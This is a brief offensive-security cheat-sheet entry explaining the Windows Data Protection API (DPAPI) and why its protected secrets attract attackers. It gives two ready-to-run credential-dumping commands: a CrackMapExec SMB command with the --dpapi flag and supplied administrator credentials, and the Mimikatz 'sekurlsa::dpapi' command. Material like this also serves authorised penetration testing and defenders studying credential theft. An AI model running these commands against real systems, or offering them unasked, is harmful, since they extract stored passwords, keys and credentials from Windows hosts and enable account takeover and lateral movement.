Data Protection API (DPAPI)
DPAPI (Data Protection Application Programming Interface) is a Windows operating system feature that provides data protection by encrypting sensitive data using a user's login credentials. DPAPI is used by various applications to protect sensitive information such as passwords, keys, and credentials.
If an attacker gains access to a user's login credentials, they can use DPAPI to decrypt the protected data. Therefore, DPAPI is a valuable target for attackers looking to gain access to sensitive information.
# Dumping DPAPI with CrackMapExec
## Requires Local Administrator privileges
crackmapexec smb $ip -u $user -p $password --dpapi
# Dumping DPAPI with Mimikatz
sekurlsa::dpapi